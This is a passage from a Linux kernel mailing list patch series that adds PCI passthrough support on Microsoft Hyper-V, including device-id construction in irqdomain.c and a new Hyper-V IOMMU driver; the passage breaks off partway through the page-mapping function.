+++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> On Hyper-V, most hypercalls related to PCI passthru to map/unmap regions, interrupts, etc need a device id as a parameter. A device id refers to a specific device. A device id is of two types: o Logical: used for direct attach (see below) hypercalls. A logical device id is a unique 62bit value that is created and sent during the initial device attach. Then all further communications (for interrupt remaps etc) must use this logical id. o PCI: used for device domain hypercalls such as map, unmap, etc. This is built using actual device BDF info. PS: Since an L1VH only supports direct attaches, a logical device id on an L1VH VM is always a VMBus device id. For non-L1VH cases, we just use PCI BDF info, altho not strictly needed, to build the logical device id. At a high level, Hyper-V supports two ways to do PCI passthru: 1. Device Domain: root must create a device domain in the hypervisor, and do map/unmap hypercalls for mapping and unmapping guest RAM. All hypervisor communications use device id of type PCI for identifying and referencing the device. 2. Direct Attach: the hypervisor will simply use the guest's HW page table for mappings, thus the host need not do map/unmap hypercalls. A direct attached device must be referenced via logical device id and never via the PCI device id. For an L1VH root/parent, Hyper-V only supports direct attaches. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- arch/x86/hyperv/irqdomain.c | 60 ++++++++++++++++++++++++++++++--- arch/x86/include/asm/mshyperv.h | 14 ++++++++ 2 files changed, 70 insertions(+), 4 deletions(-) diff --git a/arch/x86/hyperv/irqdomain.c b/arch/x86/hyperv/irqdomain.c index ccbe5848a28f..33017aa0caa4 100644 --- a/arch/x86/hyperv/irqdomain.c +++ b/arch/x86/hyperv/irqdomain.c @@ -137,7 +137,7 @@ static int get_rid_cb(struct pci_dev *pdev, u16 alias, void *data) return 0; } -static union hv_device_id hv_build_devid_type_pci(struct pci_dev *pdev) +static u64 hv_build_devid_type_pci(struct pci_dev *pdev) { int pos; union hv_device_id hv_devid; @@ -197,7 +197,58 @@ static union hv_device_id hv_build_devid_type_pci(struct pci_dev *pdev) } out: - return hv_devid; + return hv_devid.as_uint64; +} + +/* Build device id for direct attached devices */ +static u64 hv_build_devid_type_logical(struct pci_dev *pdev) +{ + hv_pci_segment segment; + union hv_device_id hv_devid; + union hv_pci_bdf bdf = {.as_uint16 = 0}; + struct rid_data data = { + .bridge = NULL, + .rid = PCI_DEVID(pdev->bus->number, pdev->devfn) + }; + + segment = pci_domain_nr(pdev->bus); + bdf.bus = PCI_BUS_NUM(data.rid); + bdf.device = PCI_SLOT(data.rid); + bdf.function = PCI_FUNC(data.rid); + + hv_devid.as_uint64 = 0; + hv_devid.device_type = HV_DEVICE_TYPE_LOGICAL; + hv_devid.logical.id = (u64)segment << 16 | bdf.as_uint16; + + return hv_devid.as_uint64; +} + +/* Build device id after the device has been attached */ +u64 hv_build_devid_oftype(struct pci_dev *pdev, enum hv_device_type type) +{ + if (type == HV_DEVICE_TYPE_LOGICAL) { + if (hv_l1vh_partition()) + return hv_pci_vmbus_device_id(pdev); + else + return hv_build_devid_type_logical(pdev); + } else if (type == HV_DEVICE_TYPE_PCI) + return hv_build_devid_type_pci(pdev); + + return 0; +} +EXPORT_SYMBOL_GPL(hv_build_devid_oftype); + +/* Build device id for the interrupt path */ +static u64 hv_build_irq_devid(struct pci_dev *pdev) +{ + enum hv_device_type dev_type; + + if (hv_pcidev_is_attached_dev(pdev) || hv_l1vh_partition()) + dev_type = HV_DEVICE_TYPE_LOGICAL; + else + dev_type = HV_DEVICE_TYPE_PCI; + + return hv_build_devid_oftype(pdev, dev_type); } /* @@ -221,7 +272,7 @@ int hv_map_msi_interrupt(struct irq_data *data, msidesc = irq_data_get_msi_desc(data); pdev = msi_desc_to_pci_dev(msidesc); - hv_devid = hv_build_devid_type_pci(pdev); + hv_devid.as_uint64 = hv_build_irq_devid(pdev); cpu = cpumask_first(irq_data_get_effective_affinity_mask(data)); return hv_map_interrupt(hv_current_partition_id, hv_devid, false, cpu, @@ -296,7 +347,8 @@ static int hv_unmap_msi_interrupt(struct pci_dev *pdev, { union hv_device_id hv_devid; - hv_devid = hv_build_devid_type_pci(pdev); + hv_devid.as_uint64 = hv_build_irq_devid(pdev); + return hv_unmap_interrupt(hv_devid.as_uint64, irq_entry); } diff --git a/arch/x86/include/asm/mshyperv.h b/arch/x86/include/asm/mshyperv.h index 0d7fdfb25e76..97477c5a8487 100644 --- a/arch/x86/include/asm/mshyperv.h +++ b/arch/x86/include/asm/mshyperv.h @@ -188,6 +188,20 @@ bool hv_vcpu_is_preempted(int vcpu); static inline void hv_apic_init(void) {} #endif +#if IS_ENABLED(CONFIG_HYPERV_IOMMU) +static inline bool hv_pcidev_is_attached_dev(struct pci_dev *pdev) +{ return false; } /* temporary */ +u64 hv_build_devid_oftype(struct pci_dev *pdev, enum hv_device_type type); +#else /* CONFIG_HYPERV_IOMMU */ +static inline bool hv_pcidev_is_attached_dev(struct pci_dev *pdev) +{ return false; } + +static inline u64 hv_build_devid_oftype(struct pci_dev *pdev, + enum hv_device_type type) +{ return 0; } + +#endif /* CONFIG_HYPERV_IOMMU */ + u64 hv_pci_vmbus_device_id(struct pci_dev *pdev); struct irq_domain *hv_create_pci_msi_domain(void); -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:26 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> Add a new file to implement management of device domains, mapping and unmapping of iommu memory, and other iommu_ops to fit within the VFIO framework for PCI passthru on Hyper-V running Linux as root or L1VH parent. This also implements direct attach mechanism for PCI passthru, and it is also made to work within the VFIO framework. At a high level, during boot the hypervisor creates a default identity domain and attaches all devices to it. This nicely maps to Linux iommu subsystem IOMMU_DOMAIN_IDENTITY domain. As a result, Linux does not need to explicitly ask Hyper-V to attach devices and do maps/unmaps during boot. As mentioned previously, Hyper-V supports two ways to do PCI passthru: 1. Device Domain: root must create a device domain in the hypervisor, and do map/unmap hypercalls for mapping and unmapping guest RAM. All hypervisor communications use device id of type PCI for identifying and referencing the device. 2. Direct Attach: the hypervisor will simply use the guest's HW page table for mappings, thus the host need not do map/unmap device memory hypercalls. As such, direct attach passthru setup during guest boot is extremely fast. A direct attached device must be referenced via logical device id and not via the PCI device id. At present, L1VH root/parent only supports direct attaches. Also direct attach is default in non-L1VH cases because there are some significant performance issues with device domain implementation currently for guests with higher RAM (say more than 8GB), and that unfortunately cannot be addressed in the short term. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- MAINTAINERS | 1 + arch/x86/include/asm/mshyperv.h | 7 +- arch/x86/kernel/pci-dma.c | 2 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 876 ++++++++++++++++++++++++++++++++ include/linux/hyperv.h | 6 + 6 files changed, 890 insertions(+), 4 deletions(-) create mode 100644 drivers/iommu/hyperv-iommu.c diff --git a/MAINTAINERS b/MAINTAINERS index 381a0e086382..63160cee942c 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -11741,6 +11741,7 @@ F: drivers/hid/hid-hyperv.c F: drivers/hv/ F: drivers/infiniband/hw/mana/ F: drivers/input/serio/hyperv-keyboard.c +F: drivers/iommu/hyperv-iommu.c F: drivers/iommu/hyperv-irq.c F: drivers/net/ethernet/microsoft/ F: drivers/net/hyperv/ diff --git a/arch/x86/include/asm/mshyperv.h b/arch/x86/include/asm/mshyperv.h index 97477c5a8487..e4ccdbbf1d12 100644 --- a/arch/x86/include/asm/mshyperv.h +++ b/arch/x86/include/asm/mshyperv.h @@ -189,16 +189,17 @@ static inline void hv_apic_init(void) {} #endif #if IS_ENABLED(CONFIG_HYPERV_IOMMU) -static inline bool hv_pcidev_is_attached_dev(struct pci_dev *pdev) -{ return false; } /* temporary */ +bool hv_pcidev_is_attached_dev(struct pci_dev *pdev); u64 hv_build_devid_oftype(struct pci_dev *pdev, enum hv_device_type type); +u64 hv_iommu_get_curr_partid(void); #else /* CONFIG_HYPERV_IOMMU */ static inline bool hv_pcidev_is_attached_dev(struct pci_dev *pdev) { return false; } - static inline u64 hv_build_devid_oftype(struct pci_dev *pdev, enum hv_device_type type) { return 0; } +static inline u64 hv_iommu_get_curr_partid(void) +{ return HV_PARTITION_ID_INVALID; } #endif /* CONFIG_HYPERV_IOMMU */ diff --git a/arch/x86/kernel/pci-dma.c b/arch/x86/kernel/pci-dma.c index 6267363e0189..cfeee6505e17 100644 --- a/arch/x86/kernel/pci-dma.c +++ b/arch/x86/kernel/pci-dma.c @@ -8,6 +8,7 @@ #include <linux/gfp.h> #include <linux/pci.h> #include <linux/amd-iommu.h> +#include <linux/hyperv.h> #include <asm/proto.h> #include <asm/dma.h> @@ -105,6 +106,7 @@ void __init pci_iommu_alloc(void) gart_iommu_hole_init(); amd_iommu_detect(); detect_intel_iommu(); + hv_iommu_detect(); swiotlb_init(x86_swiotlb_enable, x86_swiotlb_flags); } diff --git a/drivers/iommu/Makefile b/drivers/iommu/Makefile index 598c39558e7d..cc9774864b00 100644 --- a/drivers/iommu/Makefile +++ b/drivers/iommu/Makefile @@ -30,7 +30,7 @@ obj-$(CONFIG_TEGRA_IOMMU_SMMU) += tegra-smmu.o obj-$(CONFIG_EXYNOS_IOMMU) += exynos-iommu.o obj-$(CONFIG_FSL_PAMU) += fsl_pamu.o fsl_pamu_domain.o obj-$(CONFIG_S390_IOMMU) += s390-iommu.o -obj-$(CONFIG_HYPERV_IOMMU) += hyperv-irq.o +obj-$(CONFIG_HYPERV_IOMMU) += hyperv-irq.o hyperv-iommu.o obj-$(CONFIG_VIRTIO_IOMMU) += virtio-iommu.o obj-$(CONFIG_IOMMU_SVA) += iommu-sva.o obj-$(CONFIG_IOMMU_IOPF) += io-pgfault.o diff --git a/drivers/iommu/hyperv-iommu.c b/drivers/iommu/hyperv-iommu.c new file mode 100644 index 000000000000..548483fec6b1 --- /dev/null +++ b/drivers/iommu/hyperv-iommu.c @@ -0,0 +1,876 @@ +// SPDX-License-Identifier: GPL-2.0 +/* + * Hyper-V root vIOMMU driver. + * Copyright (C) 2026, Microsoft, Inc. + */ + +#include <linux/module.h> +#include <linux/pci.h> +#include <linux/dmar.h> +#include <linux/dma-map-ops.h> +#include <linux/interval_tree.h> +#include <linux/hyperv.h> +#include "dma-iommu.h" +#include <asm/iommu.h> +#include <asm/mshyperv.h> + +/* We will not claim these PCI devices, eg hypervisor needs it for debugger */ +static char *pci_devs_to_skip; +static int __init hv_iommu_setup_skip(char *str) +{ + pci_devs_to_skip = str; + + return 0; +} +/* hv_iommu_skip=(SSSS:BB:DD.F)(SSSS:BB:DD.F) */ +__setup("hv_iommu_skip=", hv_iommu_setup_skip); + +bool hv_no_attdev; /* disable direct device attach for passthru */ +EXPORT_SYMBOL_GPL(hv_no_attdev); +static int __init setup_hv_no_attdev(char *str) +{ + hv_no_attdev = true; + return 0; +} +__setup("hv_no_attdev", setup_hv_no_attdev); + +/* Iommu device that we export to the world. HyperV supports max of one */ +static struct iommu_device hv_virt_iommu; + +struct hv_domain { + struct iommu_domain iommu_dom; + u32 domid_num; /* as opposed to domain_id.type */ + u32 num_attchd; /* number of currently attached devices */ + bool attached_dom; /* is this direct attached dom? */ + spinlock_t mappings_lock; /* protects mappings_tree */ + struct rb_root_cached mappings_tree; /* iova to pa lookup tree */ +}; + +#define to_hv_domain(d) container_of(d, struct hv_domain, iommu_dom) + +struct hv_iommu_mapping { + phys_addr_t paddr; + struct interval_tree_node iova; + u32 flags; +}; + +/* + * By default, during boot the hypervisor creates one Stage 2 (S2) default + * domain. Stage 2 means that the page table is controlled by the hypervisor. + * S2 default: access to entire root partition memory. This for us easily + * maps to IOMMU_DOMAIN_IDENTITY in the iommu subsystem, and + * is called HV_DEVICE_DOMAIN_ID_S2_DEFAULT in the hypervisor. + * + * Device Management: + * There are two ways to manage device attaches to domains: + * 1. Domain Attach: A device domain is created in the hypervisor, the + * device is attached to this domain, and then memory + * ranges are mapped in the map callbacks. + * 2. Direct Attach: No need to create a domain in the hypervisor for direct + * attached devices. A hypercall is made to tell the + * hypervisor to attach the device to a guest. There is + * no need for explicit memory mappings because the + * hypervisor will just use the guest HW page table. + * + * Since a direct attach is much faster, it is the default. This can be + * changed via hv_no_attdev. + * + * L1VH: hypervisor only supports direct attach. + */ + +/* + * Create dummy domain to correspond to hypervisor prebuilt default identity + * domain (dummy because we do not make hypercall to create them). + */ +static struct hv_domain hv_def_identity_dom; + +static bool hv_special_domain(struct hv_domain *hvdom) +{ + return hvdom == &hv_def_identity_dom; +} + +struct iommu_domain_geometry default_geometry = (struct iommu_domain_geometry) { + .aperture_start = 0, + .aperture_end = -1UL, + .force_aperture = true, +}; + +/* + * Since the relevant hypercalls can only fit less than 512 PFNs in the pfn + * array, report 1M max. + */ +#define HV_IOMMU_PGSIZES (SZ_4K | SZ_1M) + +static u32 unique_id; /* unique numeric id of a new domain */ + +static void hv_iommu_detach_dev(struct iommu_domain *immdom, + struct device *dev); +static size_t hv_iommu_unmap_pages(struct iommu_domain *immdom, ulong iova, + size_t pgsize, size_t pgcount, + struct iommu_iotlb_gather *gather); + +/* + * If the current thread is a VMM thread, return the partition id of the VM it + * is managing, else return HV_PARTITION_ID_INVALID. + */ +u64 hv_iommu_get_curr_partid(void) +{ + u64 (*fn)(pid_t pid); + u64 partid; + + fn = symbol_get(mshv_pid_to_partid); + if (!fn) + return HV_PARTITION_ID_INVALID; + + partid = fn(current->tgid); + symbol_put(mshv_pid_to_partid); + + return partid; +} + +/* If this is a VMM thread, then this domain is for a guest VM */ +static bool hv_curr_thread_is_vmm(void) +{ + return hv_iommu_get_curr_partid() != HV_PARTITION_ID_INVALID; +} + +static bool hv_iommu_capable(struct device *dev, enum iommu_cap cap) +{ + switch (cap) { + case IOMMU_CAP_CACHE_COHERENCY: + return true; + default: + return false; + } + return false; +} + +/* + * Check if given pci device is a direct attached device. Caller must have + * verified pdev is a valid pci device. + */ +bool hv_pcidev_is_attached_dev(struct pci_dev *pdev) +{ + struct iommu_domain *iommu_domain; + struct hv_domain *hvdom; + struct device *dev = &pdev->dev; + + iommu_domain = iommu_get_domain_for_dev(dev); + if (iommu_domain) { + hvdom = to_hv_domain(iommu_domain); + return hvdom->attached_dom; + } + + return false; +} +EXPORT_SYMBOL_GPL(hv_pcidev_is_attached_dev); + +/* Create a new device domain in the hypervisor */ +static int hv_iommu_create_hyp_devdom(struct hv_domain *hvdom) +{ + u64 status; + unsigned long flags; + struct hv_input_device_domain *ddp; + struct hv_input_create_device_domain *input; + + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + memset(input, 0, sizeof(*input)); + + ddp = &input->device_domain; + ddp->partition_id = HV_PARTITION_ID_SELF; + ddp->domain_id.type = HV_DEVICE_DOMAIN_TYPE_S2; + ddp->domain_id.id = hvdom->domid_num; + + input->create_device_domain_flags.forward_progress_required = 1; + input->create_device_domain_flags.inherit_owning_vtl = 0; + + status = hv_do_hypercall(HVCALL_CREATE_DEVICE_DOMAIN, input, NULL); + + local_irq_restore(flags); + + if (!hv_result_success(status)) + hv_status_err(status, "\n"); + + return hv_result_to_errno(status); +} + +/* During boot, all devices are attached to this */ +static struct iommu_domain *hv_iommu_domain_alloc_identity(struct device *dev) +{ + return &hv_def_identity_dom.iommu_dom; +} + +static struct iommu_domain *hv_iommu_domain_alloc_paging(struct device *dev) +{ + struct hv_domain *hvdom; + int rc; + + if (hv_l1vh_partition() && !hv_curr_thread_is_vmm() && !hv_no_attdev) { + pr_err("Hyper-V: l1vh iommu does not support host devices\n"); + return NULL; + } + + hvdom = kzalloc(sizeof(struct hv_domain), GFP_KERNEL); + if (hvdom == NULL) + goto out; + + spin_lock_init(&hvdom->mappings_lock); + hvdom->mappings_tree = RB_ROOT_CACHED; + + if (++unique_id == HV_DEVICE_DOMAIN_ID_S2_DEFAULT) /* ie, 0 */ + goto out_free; + + hvdom->domid_num = unique_id; + hvdom->iommu_dom.geometry = default_geometry; + hvdom->iommu_dom.pgsize_bitmap = HV_IOMMU_PGSIZES; + + /* For guests, by default we do direct attaches, so no domain in hyp */ + if (hv_curr_thread_is_vmm() && !hv_no_attdev) + hvdom->attached_dom = true; + else { + rc = hv_iommu_create_hyp_devdom(hvdom); + if (rc) + goto out_free_id; + } + + return &hvdom->iommu_dom; + +out_free_id: + unique_id--; +out_free: + kfree(hvdom); +out: + return NULL; +} + +static void hv_iommu_domain_free(struct iommu_domain *immdom) +{ + struct hv_domain *hvdom = to_hv_domain(immdom); + unsigned long flags; + u64 status; + struct hv_input_delete_device_domain *input; + + if (hv_special_domain(hvdom)) + return; + + if (hvdom->num_attchd) { + pr_err("Hyper-V: can't free busy iommu domain (%p)\n", immdom); + return; + } + + if (!hv_curr_thread_is_vmm() || hv_no_attdev) { + struct hv_input_device_domain *ddp; + + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + ddp = &input->device_domain; + memset(input, 0, sizeof(*input)); + + ddp->partition_id = HV_PARTITION_ID_SELF; + ddp->domain_id.type = HV_DEVICE_DOMAIN_TYPE_S2; + ddp->domain_id.id = hvdom->domid_num; + + status = hv_do_hypercall(HVCALL_DELETE_DEVICE_DOMAIN, input, + NULL); + local_irq_restore(flags); + + if (!hv_result_success(status)) + hv_status_err(status, "\n"); + } + + kfree(hvdom); +} + +/* Attach a device to a domain previously created in the hypervisor */ +static int hv_iommu_att_dev2dom(struct hv_domain *hvdom, struct pci_dev *pdev) +{ + unsigned long flags; + u64 status; + enum hv_device_type dev_type; + struct hv_input_attach_device_domain *input; + + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + memset(input, 0, sizeof(*input)); + + input->device_domain.partition_id = HV_PARTITION_ID_SELF; + input->device_domain.domain_id.type = HV_DEVICE_DOMAIN_TYPE_S2; + input->device_domain.domain_id.id = hvdom->domid_num; + + /* NB: Upon guest shutdown, device is re-attached to the default domain + * without explicit detach. + */ + if (hv_l1vh_partition()) + dev_type = HV_DEVICE_TYPE_LOGICAL; + else + dev_type = HV_DEVICE_TYPE_PCI; + + input->device_id.as_uint64 = hv_build_devid_oftype(pdev, dev_type); + + status = hv_do_hypercall(HVCALL_ATTACH_DEVICE_DOMAIN, input, NULL); + local_irq_restore(flags); + + if (!hv_result_success(status)) + hv_status_err(status, "\n"); + + return hv_result_to_errno(status); +} + +/* Caller must have validated that dev is a valid pci dev */ +static int hv_iommu_direct_attach_device(struct pci_dev *pdev) +{ + struct hv_input_attach_device *input; + u64 status; + int rc; + unsigned long flags; + union hv_device_id host_devid; + enum hv_device_type dev_type; + u64 ptid = hv_iommu_get_curr_partid(); + + if (ptid == HV_PARTITION_ID_INVALID) { + pr_err("Hyper-V: Invalid partition id in direct attach\n"); + return -EINVAL; + } + + if (hv_l1vh_partition()) + dev_type = HV_DEVICE_TYPE_LOGICAL; + else + dev_type = HV_DEVICE_TYPE_PCI; + + host_devid.as_uint64 = hv_build_devid_oftype(pdev, dev_type); + + do { + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + memset(input, 0, sizeof(*input)); + input->partition_id = ptid; + input->device_id = host_devid; + + /* Hypervisor associates logical_id with this device, and in + * some hypercalls like retarget interrupts, logical_id must be + * used instead of the BDF. It is a required parameter. + */ + input->attdev_flags.logical_id = 1; + input->logical_devid = + hv_build_devid_oftype(pdev, HV_DEVICE_TYPE_LOGICAL); + + status = hv_do_hypercall(HVCALL_ATTACH_DEVICE, input, NULL); + local_irq_restore(flags); + + if (hv_result(status) == HV_STATUS_INSUFFICIENT_MEMORY) { + rc = hv_call_deposit_pages(NUMA_NO_NODE, ptid, 1); + if (rc) + break; + } + } while (hv_result(status) == HV_STATUS_INSUFFICIENT_MEMORY); + + if (!hv_result_success(status)) + hv_status_err(status, "\n"); + + return hv_result_to_errno(status); +} + +/* This to attach a device to both host app (like DPDK) and a guest VM */ +static int hv_iommu_attach_dev(struct iommu_domain *immdom, struct device *dev, + struct iommu_domain *old) +{ + struct pci_dev *pdev; + int rc; + struct hv_domain *hvdom_new = to_hv_domain(immdom); + struct hv_domain *hvdom_prev = dev_iommu_priv_get(dev); + + /* Only allow PCI devices for now */ + if (!dev_is_pci(dev)) + return -EINVAL; + + pdev = to_pci_dev(dev); + + /* l1vh does not support host device (eg DPDK) passthru */ + if (hv_l1vh_partition() && !hv_special_domain(hvdom_new) && + !hvdom_new->attached_dom) + return -EINVAL; + + /* + * VFIO does not do explicit detach calls, hence check first if we need + * to detach first. Also, in case of guest shutdown, it's the VMM + * thread that attaches it back to the hv_def_identity_dom, and + * hvdom_prev will not be null then. It is null during boot. + */ + if (hvdom_prev) + if (!hv_l1vh_partition() || !hv_special_domain(hvdom_prev)) + hv_iommu_detach_dev(&hvdom_prev->iommu_dom, dev); + + if (hv_l1vh_partition() && hv_special_domain(hvdom_new)) { + dev_iommu_priv_set(dev, hvdom_new); /* sets "private" field */ + return 0; + } + + if (hvdom_new->attached_dom) + rc = hv_iommu_direct_attach_device(pdev); + else + rc = hv_iommu_att_dev2dom(hvdom_new, pdev); + + if (rc && hvdom_prev) { + int rc1; + + if (hvdom_prev->attached_dom) + rc1 = hv_iommu_direct_attach_device(pdev); + else + rc1 = hv_iommu_att_dev2dom(hvdom_prev, pdev); + + if (rc1) + pr_err("Hyper-V: iommu could not restore orig device state.. dev:%s\n", + dev_name(dev)); + } + + if (rc == 0) { + dev_iommu_priv_set(dev, hvdom_new); /* sets "private" field */ + hvdom_new->num_attchd++; + } + + return rc; +} + +static void hv_iommu_det_dev_from_guest(struct hv_domain *hvdom, + struct pci_dev *pdev) +{ + struct hv_input_detach_device *input; + u64 status, log_devid; + unsigned long flags; + + log_devid = hv_build_devid_oftype(pdev, HV_DEVICE_TYPE_LOGICAL); + + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + memset(input, 0, sizeof(*input)); + + input->partition_id = hv_iommu_get_curr_partid(); + input->logical_devid = log_devid; + status = hv_do_hypercall(HVCALL_DETACH_DEVICE, input, NULL); + local_irq_restore(flags); + + if (!hv_result_success(status)) + hv_status_err(status, "\n"); +} + +static void hv_iommu_det_dev_from_dom(struct hv_domain *hvdom, + struct pci_dev *pdev) +{ + u64 status, devid; + unsigned long flags; + struct hv_input_detach_device_domain *input; + + devid = hv_build_devid_oftype(pdev, HV_DEVICE_TYPE_PCI); + + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + memset(input, 0, sizeof(*input)); + + input->partition_id = HV_PARTITION_ID_SELF; + input->device_id.as_uint64 = devid; + status = hv_do_hypercall(HVCALL_DETACH_DEVICE_DOMAIN, input, NULL); + local_irq_restore(flags); + + if (!hv_result_success(status)) + hv_status_err(status, "\n"); +} + +static void hv_iommu_detach_dev(struct iommu_domain *immdom, struct device *dev) +{ + struct pci_dev *pdev; + struct hv_domain *hvdom = to_hv_domain(immdom); + + /* See the attach function, only PCI devices for now */ + if (!dev_is_pci(dev)) + return; + + if (hvdom->num_attchd == 0) + pr_warn("Hyper-V: num_attchd is zero (%s)\n", dev_name(dev)); + + pdev = to_pci_dev(dev); + + if (hvdom->attached_dom) { + hv_iommu_det_dev_from_guest(hvdom, pdev); + + /* Do not reset attached_dom, hv_iommu_unmap_pages happens + * next. + */ + } else { + hv_iommu_det_dev_from_dom(hvdom, pdev); + } + + hvdom->num_attchd--; +} + +static int hv_iommu_add_tree_mapping(struct hv_domain *hvdom, + unsigned long iova, phys_addr_t paddr, + size_t size, u32 flags) +{ + unsigned long irqflags; + struct hv_iommu_mapping *mapping; + + mapping = kzalloc(sizeof(*mapping), GFP_ATOMIC); + if (!mapping) + return -ENOMEM; + + mapping->paddr = paddr; + mapping->iova.start = iova; + mapping->iova.last = iova + size - 1; + mapping->flags = flags; + + spin_lock_irqsave(&hvdom->mappings_lock, irqflags); + interval_tree_insert(&mapping->iova, &hvdom->mappings_tree); + spin_unlock_irqrestore(&hvdom->mappings_lock, irqflags); + + return 0; +} + +static size_t hv_iommu_del_tree_mappings(struct hv_domain *hvdom, + unsigned long iova, size_t size) +{ + unsigned long flags; + size_t unmapped = 0; + unsigned long last = iova + size - 1; + struct hv_iommu_mapping *mapping = NULL; + struct interval_tree_node *node, *next; + + spin_lock_irqsave(&hvdom->mappings_lock, flags); + next = interval_tree_iter_first(&hvdom->mappings_tree, iova, last); + while (next) { + node = next; + mapping = container_of(node, struct hv_iommu_mapping, iova); + next = interval_tree_iter_next(node, iova, last); + + /* Trying to split a mapping? Not supported for now. */ + if (mapping->iova.start < iova) + break; + + unmapped += mapping->iova.last - mapping->iova.start + 1; + + interval_tree_remove(node, &hvdom->mappings_tree); + kfree(mapping); + } + spin_unlock_irqrestore(&hvdom->mappings_lock, flags); + + return unmapped; +} + +/* Return: must return exact status from the hypercall without changes */ +static u64 hv_iommu_map_pgs(struct hv_domain *hvdom, + unsigned long iova, phys_addr_t paddr, + unsigned long npages, u32 map_flags) +{ + u64 status; + int i; + struct hv_input_map_device_gpa_pages *input; + unsigned long flags, pfn = paddr >> HV_HYP_PAGE_SHIFT; + + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + memset(input, 0, sizeof(*input)); + + input->device_domain.partition_id = HV_PARTITION_ID_SELF; + input->device_domain.domain_id.type = HV_DEVICE_DOMAIN_TYPE_S2; + input->device_domain.domain_id.id = hvdom->domid_num; + input->map_flags = map_flags; + input->target_device_va_base = iova; + + pfn = paddr >> HV_HYP_PAGE_SHIFT; + for (i = 0; i < npages; i++, pfn++) + input->gpa_page_list[i] = pfn; + + status = hv_do_rep_hypercall(HVCALL_MAP_DEVICE_GPA_PAGES, npages, 0, + input, NULL); + + local_irq_restore(flags); + return status; +} + +/* + * The core VFIO code loops over memory ranges calling this function with + * the largest size from HV_IOMMU_PGSIZES. cond_resched() is in vfio_iommu_map. + */ +static int hv_iommu_map_pages(struct iommu_domain *immdom, ulong iova, + phys_addr_t paddr, size_t pgsize, size_t pgcount, + int prot, gfp_t gfp, size_t *mapped) +{ + u32 map_flags; + int ret; + u64 status; + unsigned long npages, done = 0; + struct hv_domain *hvdom = to_hv_domain(immdom); + size_t size = pgsize * pgcount; + + map_flags = HV_MAP_GPA_READABLE; /* required */ + map_flags |= prot & IOMMU_WRITE ? HV_MAP_GPA_WRITABLE : 0; + + ret = hv_iommu_add_tree_mapping(hvdom, iova, paddr, size, map_flags); + if (ret) + return ret; + + if (hvdom->attached_dom) { + *mapped = size; + return 0; + } + + npages = size >> HV_HYP_PAGE_SHIFT; + while (done < npages) { + ulong completed, remain = npages - done; + + status = 